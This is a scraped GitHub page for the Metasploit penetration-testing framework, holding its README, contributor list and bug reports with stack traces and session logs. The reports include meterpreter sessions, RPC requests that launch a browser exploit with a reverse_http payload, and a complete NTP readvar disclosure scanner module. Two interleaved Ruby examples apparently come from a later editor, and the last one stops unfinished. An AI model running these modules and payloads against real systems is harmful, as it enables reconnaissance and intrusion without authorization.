rapid7 / metasploit-framework

Metasploit Framework

Home Page: https://www.metasploit.com/

License: Other

Ruby 94.41% Shell 0.02% C 1.31% HTML 0.20% JavaScript 0.13% PowerShell 3.08% Python 0.55% PHP 0.01% Assembly 0.08% DIGITAL Command Language 0.01% Batchfile 0.01% Objective-C 0.01% Makefile 0.03% CSS 0.01% PostScript 0.01% C++ 0.01% Dockerfile 0.02% Go 0.04% Rich Text Format 0.08% VBScript 0.01%

metasploit-framework's Introduction


The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

You can find documentation on Metasploit and how to use it at: https://docs.metasploit.com/

Information about setting up a development environment can be found at: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html

Our bug and feature request tracker can be found at: https://github.com/rapid7/metasploit-framework/issues

New bugs and feature requests should be directed to: https://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://docs.metasploit.com/api/

Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading the basics of using Metasploit or Metasploit Unleashed.

Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.

metasploit-framework's People

Contributors

adfoster-r7, aushack, auxilus, bcoles, cbrnrd, cgranleese-r7, cn-kali-team, ebleiweiss-r7, erikwynter, green-m, gwillcox-r7, h00die, h00die-gr3y, heyder, itsmeroy2012, jheysel-r7, jrobles-r7, mdisec, msjenkins-r7, nixawk, pingport80, qkaiser, rad10, rbowes-r7, red0xff, rootup, sfewer-r7, shipcod3, stephenfewer, wvu


metasploit-framework's Issues

ie_execcommand_uaf - undefined method `[]' for nil:NilClass

Exception when calling the actual IE 0day exploit. SVN-Revision: 15858

msf  exploit(ie_execcommand_uaf) > [*] Using URL: http://XXXXXXXX:8080/sQv2rZCBBA
[*] Server started.
[*] XXXXXXXX     ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 1.1.4322; Tablet PC 2.0)
[*] XXXXXXXX     ie_execcommand_uaf - Redirecting to wFMCx.html
[*] XXXXXXXX     ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 1.1.4322; Tablet PC 2.0)
[*] XXXXXXXX     ie_execcommand_uaf - Loading wFMCx.html
[-] XXXXXXXX     ie_execcommand_uaf - Exception handling request: undefined method `[]' for nil:NilClass

RuntimeError can't add a new key into hash during iteration

When selecting a payload the framework will occasionally throw an error about inserting a new key into a hash during iteration. To reproduce, edit a module within the framework a few times, and pry the edited module for good measure.

This error makes running any exploits impossible without a framework restart as payloads cannot be set or tab completed

Example output when trying to tab complete a payload in a module:
set PAYLOAD wi[-] RbReadline Error: RuntimeError can't add a new key into hash during iteration

/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:308:in `[]='
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:308:in `add_single'
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:105:in `block in recalculate'
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:94:in `each_pair'
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:94:in `recalculate'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:84:in `create'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:195:in `block in demand_load_modules'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:191:in `each_pair'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:191:in `demand_load_modules'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:128:in `each_module'
/opt/metasploit4/msf4/lib/msf/core/exploit.rb:805:in `compatible_payloads'
/opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:2513:in `option_values_payloads'
/opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:2404:in `tab_complete_option'
/opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:1858:in `cmd_set_tabs'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:350:in `tab_complete_helper'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:310:in `block in tab_complete_stub'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:299:in `each'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:299:in `tab_complete_stub'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:284:in `tab_complete'
/opt/metasploit4/msf4/lib/rex/ui/text/shell.rb:59:in `block in init_tab_complete'
/opt/metasploit4/msf4/lib/readline_compatible.rb:157:in `call'
/opt/metasploit4/msf4/lib/readline_compatible.rb:157:in `readline_attempted_completion_function'
/opt/metasploit4/msf4/lib/rbreadline.rb:6262:in `gen_completion_matches'
/opt/metasploit4/msf4/lib/rbreadline.rb:6747:in `rl_complete_internal'
/opt/metasploit4/msf4/lib/rbreadline.rb:6837:in `rl_complete'
/opt/metasploit4/msf4/lib/rbreadline.rb:4307:in `_rl_dispatch_subseq'
/opt/metasploit4/msf4/lib/rbreadline.rb:4296:in `_rl_dispatch'
/opt/metasploit4/msf4/lib/rbreadline.rb:4716:in `readline_internal_charloop'
/opt/metasploit4/msf4/lib/rbreadline.rb:4790:in `readline_internal'
/opt/metasploit4/msf4/lib/rbreadline.rb:4812:in `readline'
/opt/metasploit4/msf4/lib/readline_compatible.rb:77:in `readline'
/opt/metasploit4/msf4/lib/rex/ui/text/input/readline.rb:90:in `pgets'
/opt/metasploit4/msf4/lib/rex/ui/text/shell.rb:184:in `run'
/opt/metasploit4/msf4/msfconsole:143:in `<main>'
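
The failure mode named in the report above, reproduced outside the framework as an added example (not Metasploit's code and not part of the original issue): storing a new key into a Hash from inside its own each_pair block raises this RuntimeError, and collecting the additions first avoids it. The PayloadIndex class and its method names are hypothetical.

```ruby
# Added example: hypothetical registry, not code from lib/msf/core/payload_set.rb.
class PayloadIndex
  attr_reader :table

  def initialize(stages)
    @table = {}
    stages.each { |name| @table[name] = :stage }
  end

  # Unsafe: stores derived names into the Hash it is currently walking.
  def recalculate_unsafe(stagers)
    @table.each_pair do |name, kind|
      next unless kind == :stage
      stagers.each { |stager| @table["#{name}/#{stager}"] = :staged }
    end
    self
  end

  # Safe: collect the derived names first, merge once iteration is over.
  def recalculate_safe(stagers)
    pending = {}
    @table.each_pair do |name, kind|
      next unless kind == :stage
      stagers.each { |stager| pending["#{name}/#{stager}"] = :staged }
    end
    @table.merge!(pending)
    self
  end
end

# Returns the RuntimeError message raised by the block, or nil if it completes.
def error_from
  yield
  nil
rescue RuntimeError => e
  e.message
end

def demo
  index = PayloadIndex.new(%w[meterpreter shell])   # constructed sample names
  stagers = %w[reverse_tcp bind_tcp]

  first = error_from { index.recalculate_unsafe(stagers) }    # new keys: raises
  size_after_error = index.table.size
  index.recalculate_safe(stagers)
  size_after_safe = index.table.size
  second = error_from { index.recalculate_unsafe(stagers) }   # keys already present
  third = error_from { index.recalculate_unsafe(%w[reverse_http]) } # a new name again

  { first: first, size_after_error: size_after_error,
    size_after_safe: size_after_safe, second: second, third: third }
end

demo.each { |step, result| puts "#{step}: #{result.inspect}" }
```

Assigning to a key that already exists is permitted during iteration, which is why the second unsafe pass completes; the error appears only when the loop produces a name the Hash does not hold yet.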

pull #830 - bug with mysql

Hi,

I'm the author of the module.
As you have amended the enumeration_mysql function before merging into master, the function is now broken.

Please revert to pre-#830 (the original commit was #802).

Request: Post Module - enum_computers via LDAP/AD

The enum_computers post module currently uses 'net view' in a shell to recover computers, which is pretty unreliable (it often won't return any results) and inconsistent (it doesn't return all domain computers).

As a windows domain member you can enumerate domain computers (and shared folders/printers/users/groups etc) with LDAP lookups in AD.

This is really handy for identifying specific server types etc:
c:\windows\system32\rundll32.exe dsquery.dll,OpenQueryWindow

I was wondering if it could be done via WinAPIs or some funky Powershell? Will try and implement this myself if I have some time!

Incorrect version matching for auxiliary/scanner/upnp/ssdp_msearch.rb's CVE-2013-0229 and CVE-2013-0230

I'm git-less and have gone git-tarded right now so I don't have a patch for this, but I noticed that auxiliary/scanner/upnp/ssdp_msearch.rb has what I believe to be incorrect version matches for CVE-2013-0229 and CVE-2013-0229. I believe them to be reversed in the metasploit module. For example, according to http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0230, MiniUPnPd version 1.0 is vulnerable to this, however the module will match on 1.0 - 1.3

IPv6 bind_tcp fails croaks after 2nd connection

Using a bind_ipv6_tcp binary:

[*] Started bind handler
[-] Exploit failed: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 2001:0:4aIPV6
[*] Meterpreter session 2 opened (2001:0:536IPV6 -> 2001:0:4aIPv6:8080) at 2012-09-20 20:38:42 +0000

meterpreter > run migrate -f
[*] Current server process: ipv6_8080.exe (2304)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2128
[+] Successfully migrated to process 
meterpreter > background
[*] Backgrounding session 2...
2012-09-20 20:38:57 +0000 1 0 exploit(handler) > exploit

[-] Exploit failed: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 2001:IPV6ADDRESS

^C2012-09-20 20:40:23 +0000 1 0 exploit(handler) > exploit

[*] Started bind handler

And the host is definitely still listening:

C:\Users\jdoe>netstat -ano | findstr 8080
  TCP    [::]:8080              [::]:0                 LISTENING       2304

ie_cdwnbindinfo_uaf - can't convert nil into String

[*] XXXXX  ie_cdwnbindinfo_uaf - Requesting: /test
[-] XXXXX  ie_cdwnbindinfo_uaf - Exception handling request: can't convert nil into String

Getting this error when requesting an SSL page from a Win2003 PC. Is there a parameter to enable stack traces?

add Security Type support and Enhanced Error Handling

Scanner Module: vnc_none_auth

The scanner does not seem to support all security types and when this error occurs the scanner raises RuntimeError.new("Auth negotiation failed: #{vnc.error}") on line 61.

This error causes a failure to complete a scan for a network, please update the scanner module to support these security types or improve error handling.

Security Types Unsupported:

    MAC_OSX_SECTYPE_30 = 30
    MAC_OSX_SECTYPE_35 = 35

If any more information is necessary, please feel free to contact me.

Thanks

'route add' fails on java meterpreter

Running on ARM host, used a simple command to route a single host:

meterpreter > route add 192.168.10.1 255.255.255.0 1
Creating route 192.168.10.1/255.255.255.0 -> 1
[-] stdapi_net_config_add_route: Operation failed: 1

Getting this in the logs:

[07/19/2012 10:51:48] [e(0)] meterpreter: stdapi_net_config_add_route: Operation failed: 1
[07/19/2012 10:51:48] [d(0)] meterpreter: Call stack:
metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb:152:in `add_route'
metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:212:in `cmd_route'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `call'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `run'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
metasploit-framework/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'
metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'
metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1595:in `cmd_sessions'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:143:in `<main>'

Aux modules cannot run over routed session due to missing "on_client_connect_proc"

Ruby 1.8.7
Latest revision as of today Jun/28/2012
Pastie of walk through: http://pastie.org/private/djn9rugyjizmiymy6ioczg

Getting:

[-] Auxiliary failed: NoMethodError undefined method `on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x114835440>
[-] Call stack:
[-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/proto/http/server.rb:144:in `start'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/service_manager.rb:80:in `start'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/service_manager.rb:24:in `start'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/msf/core/exploit/http/server.rb:155:in `start_service'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/msf/core/exploit/tcp.rb:314:in `exploit'
[-] /Users/mubix/Documents/code/metasploit-framework/modules/auxiliary/server/capture/http_ntlm.rb:97:in `run'

SSH Shells Broken on Cisco ASA 8.4(5)

During testing for a Cisco SSH vulnerability, I'm finding that newer ASAs do not like our standard SSH shell. The login scanner authenticates, then nothing - blank screen, no input or output. I'm seeing this on 8.4 current - 8.4(5), may be present in others.

Interestingly enough, MetaSSH does not suffer from this problem. I'm able to establish a metassh session, then run a shell and work in the shell channel without issue. Post modules however, do not work properly since the plugin is not in trunk and the session type is not handled correctly by framework.

Cisco's SSH implementation is a bit different from normal *nix systems, and I'm presently helping to resolve another vendor's issue regarding the matter. We may need to do a banner check on all our SSH scanners to accommodate for additional delay between transport and session auth.

Windows meterpreter crashes running multiple post modules

Meterpreter doesn't seem to like running concurrent post modules. Results in dead sessions. Happens in internal build of meterpreter as well as r7-trunk build.

I've seen this on several occasions before, but now that I'm starting to ramp up meterpreter's post activities this seems a much larger problem.

Try running http://pastebin.com/uqaWNAcr to enumerate user data in a meterpreter session to see the results. The script tries to throttle concurrent activity by performing a check against live threads in the sessions' thread pool and the max_threads var passed into the method. Even at 5 modules, it dies a miserable death.

db_import of Burp session fails

Steps:

  1. Save burp state (example.burp)
  2. Unzip the burp state (unzip example.burp)
  3. Rename the extracted file "burp" to "burp.xml"
  4. Run db_import /path/to/burp.xml (path has no spaces btw)
    The following Ruby stack trace is displayed:

2011-12-16 12:23:37 +0100 S:0 J:1 > db_import /root/burp.xml
[-] Error while running command db_import: getaddrinfo: Name or service not known

Call stack:
/opt/framework/msf3/lib/rex/socket.rb:176:in `gethostbyname'
/opt/framework/msf3/lib/rex/socket.rb:176:in `getaddress'
/opt/framework/msf3/lib/rex/socket.rb:124:in `is_ipv4?'
/opt/framework/msf3/lib/msf/core/db.rb:163:in `ipv4_validator'
/opt/framework/msf3/lib/msf/core/db.rb:158:in `ipv46_validator'
/opt/framework/msf3/lib/msf/core/db.rb:2226:in `import_filetype_detect'
/opt/framework/msf3/lib/msf/core/db.rb:2086:in `import'
/opt/framework/msf3/lib/msf/core/db.rb:2072:in `import_file'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1018:in `block (2 levels) in cmd_db_import'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1011:in `each'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1011:in `block in cmd_db_import'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1005:in `each'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1005:in `cmd_db_import'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:380:in `run_command'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:342:in `block in run_single'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:336:in `each'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:336:in `run_single'
/opt/framework/msf3/lib/rex/ui/text/shell.rb:199:in `run'
/opt/framework/msf3/lib/msf/ui/web/console.rb:65:in `block in initialize'
/opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `block in spawn'

2011-12-16 12:23:37 +0100 S:0 J:1 > version
Framework: 4.2.0-dev.14161
Console : 4.2.0-dev.14065

On Backtrack 5 R1 (64-bit)

Module: NTP Clock Variables Disclosure

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Udp
    include Msf::Auxiliary::Report
    include Msf::Auxiliary::Scanner

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'NTP Clock Variables Disclosure',
            'Description'    => %q{
                This module reads the system internal NTP variables. These variables contain potentially
                sensitive information, such as the NTP software version, operating system version, peers, and more.
            },
            'Author'         => 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
            'License'        => MSF_LICENSE,
            'Version'        => '',
            'References'     =>
                [
                    ['URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure'],
                ]
            )
        )
        register_options(
            [
                Opt::RPORT(123)
            ], self.class)
    end

    def run_host(ip)
        connect_udp

        # NTP mode 6 (control) request, opcode 2: the readvar command
        readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00"
        print_status("Connecting target #{rhost}:#{rport}...")

        print_status("Sending command...")
        udp_sock.put(readvar)
        reply = udp_sock.recvfrom(65535, 0.1)

        # Nothing came back before the timeout: do not call split on nil
        data = reply ? reply[0] : nil
        if data.nil? || data.empty?
            print_error("No reply from #{rhost}:#{rport}")
            return
        end

        # The reply is a comma-separated list of variables
        data.split(",").each_with_index do |var, idx|
            # 12 is the adjustment for the packet header in front of the first variable
            var = var.slice(12, var.size) if idx == 0
            print_good(var.to_s.strip)
        end
    ensure
        disconnect_udp
    end

end

Browser detection issue

Hi,

I noticed some interesting behavior when testing some IE exploits on a variety of hosts (XP with IE8, Win7 with IE8, Win7 with IE9).

Clients are configured to use a proxy, capable of doing SSL inspection (mitm).

When SSL is enabled for the exploit, the proxy will intercept and send a slightly different user agent to the msfconsole webserver... different enough to make msf bail out and tell it's not a supported platform.

What I have discovered is that the browser version is wrong, but the windows version is correct:

Actual version      What metasploit sees
XP SP3 with IE7     MSIE7 / NT 5.1
XP SP3 with IE8     MSIE7 / NT 5.1
Win7 with IE8       MSIE7 / NT 6.1
Win7 with IE9       MSIE7 / NT 6.1

If the IE8 target (which usually is based on a msvcrt.dll ROP chain) works on IE7 too, then the exploit can be successful in an increased number of cases, if the IE8 payload is used for MSIE7 / NT 5.1 at all times.

For the non-existing combination of MSIE7 / NT 6.1, it would be good enough to send the IE9 payload. It's somewhat slower, but at least it will give a shell and not a crash.

For non SSL sessions, the UA is correct.

Exploit fails to run if PAYLOAD key is last in msgpack'd message

If msgpack places the PAYLOAD key/value pair at the end of the serialized message, Metasploit fails to run the exploit with error message: "[e(0)] core: Exploit failed (multi/browser/java_jre17_jmxbean): A payload has not been selected.". Otherwise, it will run successfully if PAYLOAD is in the middle somewhere. I've attached two request/response pairs. One with PAYLOAD in the middle of the message, the other with PAYLOAD at the end. Decoding the messages manually verifies that msgpack is correctly serializing the message. However, Metasploit somehow is not liking it. Notice how the order of the PAYLOAD option affects the outcome:

This request works:

POST /api/ HTTP/1.1
Host: 127.0.0.1:55553
Accept-Encoding: identity
Content-Length: 187
Content-Type: binary/message-pack

..module.execute.. TEMPMKtYw7nAZyaW3Z0B5KVmQ1tIWJ0y.exploit.. multi/browser/java_jre17_jmxbean..LPORT....PAYLOAD.java/meterpreter/reverse_http.SRVHOST.0.0.0.0.SRVPORT....LHOST.192.168.1.2HTTP/1.1 200 OK
Content-Type: binary/message-pack
Connection: close
Server: Rex
Content-Length: 23

..job_id..uuid.axujjppw

Hex representation:

00000000  50 4f 53 54 20 2f 61 70  69 2f 20 48 54 54 50 2f POST /ap i/ HTTP/
00000010  31 2e 31 0d 0a 48 6f 73  74 3a 20 31 32 37 2e 30 1.1..Hos t: 127.0
00000020  2e 30 2e 31 3a 35 35 35  35 33 0d 0a 41 63 63 65 .0.1:555 53..Acce
00000030  70 74 2d 45 6e 63 6f 64  69 6e 67 3a 20 69 64 65 pt-Encod ing: ide
00000040  6e 74 69 74 79 0d 0a 43  6f 6e 74 65 6e 74 2d 4c ntity..C ontent-L
00000050  65 6e 67 74 68 3a 20 31  38 37 0d 0a 43 6f 6e 74 ength: 1 87..Cont
00000060  65 6e 74 2d 54 79 70 65  3a 20 62 69 6e 61 72 79 ent-Type : binary
00000070  2f 6d 65 73 73 61 67 65  2d 70 61 63 6b 0d 0a 0d /message -pack...
00000080  0a 95 ae 6d 6f 64 75 6c  65 2e 65 78 65 63 75 74 ...modul e.execut
00000090  65 da 00 20 54 45 4d 50  4d 4b 74 59 77 37 6e 41 e.. TEMP MKtYw7nA
000000A0  5a 79 61 57 33 5a 30 42  35 4b 56 6d 51 31 74 49 ZyaW3Z0B 5KVmQ1tI
000000B0  57 4a 30 79 a7 65 78 70  6c 6f 69 74 da 00 20 6d WJ0y.exp loit.. m
000000C0  75 6c 74 69 2f 62 72 6f  77 73 65 72 2f 6a 61 76 ulti/bro wser/jav
000000D0  61 5f 6a 72 65 31 37 5f  6a 6d 78 62 65 61 6e 85 a_jre17_ jmxbean.
000000E0  a5 4c 50 4f 52 54 cd 1f  90 a7 50 41 59 4c 4f 41 .LPORT.. ..PAYLOA
000000F0  44 bd 6a 61 76 61 2f 6d  65 74 65 72 70 72 65 74 D.java/m eterpret
00000100  65 72 2f 72 65 76 65 72  73 65 5f 68 74 74 70 a7 er/rever se_http.
00000110  53 52 56 48 4f 53 54 a7  30 2e 30 2e 30 2e 30 a7 SRVHOST. 0.0.0.0.
00000120  53 52 56 50 4f 52 54 cd  1f 90 a5 4c 48 4f 53 54 SRVPORT. ...LHOST
00000130  ab 31 39 32 2e 31 36 38  2e 31 2e 32             .192.168 .1.2
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 43 6f 6e 74 65 6e 74  2d 54 79 70 65 3a 20 62 .Content -Type: b
    00000020  69 6e 61 72 79 2f 6d 65  73 73 61 67 65 2d 70 61 inary/me ssage-pa
    00000030  63 6b 0d 0a 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 ck..Conn ection: 
    00000040  63 6c 6f 73 65 0d 0a 53  65 72 76 65 72 3a 20 52 close..S erver: R
    00000050  65 78 0d 0a 43 6f 6e 74  65 6e 74 2d 4c 65 6e 67 ex..Cont ent-Leng
    00000060  74 68 3a 20 32 33 0d 0a  0d 0a 82 a6 6a 6f 62 5f th: 23.. ....job_
    00000070  69 64 00 a4 75 75 69 64  a8 61 78 75 6a 6a 70 70 id..uuid .axujjpp
    00000080  77                                               w

This request doesn't:

POST /api/ HTTP/1.1
Host: 127.0.0.1:55553
Accept-Encoding: identity
Content-Length: 187
Content-Type: binary/message-pack

..module.execute.. TEMPMKtYw7nAZyaW3Z0B5KVmQ1tIWJ0y.exploit.. multi/browser/java_jre17_jmxbean..LPORT....SRVHOST.0.0.0.0.LHOST.192.168.1.2.SRVPORT....PAYLOAD.java/meterpreter/reverse_httpHTTP/1.1 200 OK
Content-Type: binary/message-pack
Connection: close
Server: Rex
Content-Length: 23

..job_id..uuid.uuvwli5v

Hex representation:

00000000  50 4f 53 54 20 2f 61 70  69 2f 20 48 54 54 50 2f POST /ap i/ HTTP/
00000010  31 2e 31 0d 0a 48 6f 73  74 3a 20 31 32 37 2e 30 1.1..Hos t: 127.0
00000020  2e 30 2e 31 3a 35 35 35  35 33 0d 0a 41 63 63 65 .0.1:555 53..Acce
00000030  70 74 2d 45 6e 63 6f 64  69 6e 67 3a 20 69 64 65 pt-Encod ing: ide
00000040  6e 74 69 74 79 0d 0a 43  6f 6e 74 65 6e 74 2d 4c ntity..C ontent-L
00000050  65 6e 67 74 68 3a 20 31  38 37 0d 0a 43 6f 6e 74 ength: 1 87..Cont
00000060  65 6e 74 2d 54 79 70 65  3a 20 62 69 6e 61 72 79 ent-Type : binary
00000070  2f 6d 65 73 73 61 67 65  2d 70 61 63 6b 0d 0a 0d /message -pack...
00000080  0a 95 ae 6d 6f 64 75 6c  65 2e 65 78 65 63 75 74 ...modul e.execut
00000090  65 da 00 20 54 45 4d 50  4d 4b 74 59 77 37 6e 41 e.. TEMP MKtYw7nA
000000A0  5a 79 61 57 33 5a 30 42  35 4b 56 6d 51 31 74 49 ZyaW3Z0B 5KVmQ1tI
000000B0  57 4a 30 79 a7 65 78 70  6c 6f 69 74 da 00 20 6d WJ0y.exp loit.. m
000000C0  75 6c 74 69 2f 62 72 6f  77 73 65 72 2f 6a 61 76 ulti/bro wser/jav
000000D0  61 5f 6a 72 65 31 37 5f  6a 6d 78 62 65 61 6e 85 a_jre17_ jmxbean.
000000E0  a5 4c 50 4f 52 54 cd 1f  90 a7 53 52 56 48 4f 53 .LPORT.. ..SRVHOS
000000F0  54 a7 30 2e 30 2e 30 2e  30 a5 4c 48 4f 53 54 ab T.0.0.0. 0.LHOST.
00000100  31 39 32 2e 31 36 38 2e  31 2e 32 a7 53 52 56 50 192.168. 1.2.SRVP
00000110  4f 52 54 cd 1f 90 a7 50  41 59 4c 4f 41 44 bd 6a ORT....P AYLOAD.j
00000120  61 76 61 2f 6d 65 74 65  72 70 72 65 74 65 72 2f ava/mete rpreter/
00000130  72 65 76 65 72 73 65 5f  68 74 74 70             reverse_ http
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 43 6f 6e 74 65 6e 74  2d 54 79 70 65 3a 20 62 .Content -Type: b
    00000020  69 6e 61 72 79 2f 6d 65  73 73 61 67 65 2d 70 61 inary/me ssage-pa
    00000030  63 6b 0d 0a 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 ck..Conn ection: 
    00000040  63 6c 6f 73 65 0d 0a 53  65 72 76 65 72 3a 20 52 close..S erver: R
    00000050  65 78 0d 0a 43 6f 6e 74  65 6e 74 2d 4c 65 6e 67 ex..Cont ent-Leng
    00000060  74 68 3a 20 32 33 0d 0a  0d 0a 82 a6 6a 6f 62 5f th: 23.. ....job_
    00000070  69 64 c0 a4 75 75 69 64  a8 75 75 76 77 6c 69 35 id..uuid .uuvwli5
    00000080  76                                               v

Drilling down in the framework, execution fails at line 83 of ./lib/msf/base/simple/exploit.rb file in the exploit_simple method:

driver.payload              = exploit.framework.payloads.create(opts['Payload'])

I've verified that opts['Payload'] is not nil. I didn't know how to trace further in the framework (not a ruby expert).

Cheers,

Nadeem
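
The two request bodies in the report above, rebuilt and decoded as an added example (not code from the report or from Metasploit): a minimal MessagePack reader for only the type bytes visible in the hex dumps, showing that both key orders decode to the same options map. The 32-byte token is a constructed placeholder, and MiniUnpacker, build_call and decode_call are hypothetical names.

```ruby
# Added example: reads only the MessagePack types seen in the capture
# (fixint, fixmap, fixarray, fixstr, nil, uint16, 16-bit length string).
class MiniUnpacker
  def initialize(bytes)
    @buf = bytes.b
    @pos = 0
  end

  def done?
    @pos == @buf.bytesize
  end

  def read
    tag = take(1).unpack1('C')
    case tag
    when 0x00..0x7f then tag                                         # positive fixint
    when 0x80..0x8f then Array.new(tag & 0x0f) { [read, read] }.to_h # fixmap
    when 0x90..0x9f then Array.new(tag & 0x0f) { read }              # fixarray
    when 0xa0..0xbf then text(tag & 0x1f)                            # fixstr
    when 0xc0 then nil
    when 0xcd then take(2).unpack1('n')                              # uint16, big-endian
    when 0xda then text(take(2).unpack1('n'))                        # 16-bit length string
    else
      raise ArgumentError, format('unsupported type byte 0x%02x at offset %d', tag, @pos - 1)
    end
  end

  private

  def take(count)
    raise ArgumentError, 'truncated message' if @pos + count > @buf.bytesize
    chunk = @buf.byteslice(@pos, count)
    @pos += count
    chunk
  end

  def text(count)
    take(count).force_encoding(Encoding::UTF_8)
  end
end

# Tiny encoder, used only to construct the two sample bodies below.
def pack_str(str)
  raw = str.b
  head = raw.bytesize < 32 ? [0xa0 | raw.bytesize].pack('C') : [0xda, raw.bytesize].pack('Cn')
  head + raw
end

def pack_value(value)
  value.is_a?(Integer) ? [0xcd, value].pack('Cn') : pack_str(value)
end

# Same layout as the capture: 5-element array whose last element is the options map.
def build_call(token, opts)
  head = ['module.execute', token, 'exploit', 'multi/browser/java_jre17_jmxbean']
  [0x95].pack('C') + head.map { |s| pack_str(s) }.join +
    [0x80 | opts.size].pack('C') + opts.map { |k, v| pack_str(k) + pack_value(v) }.join
end

def decode_call(bytes)
  reader = MiniUnpacker.new(bytes)
  message = reader.read
  raise ArgumentError, 'trailing bytes after message' unless reader.done?
  message
end

TOKEN = 'TEMP' + 'A' * 28 # constructed placeholder, same length as the token in the capture
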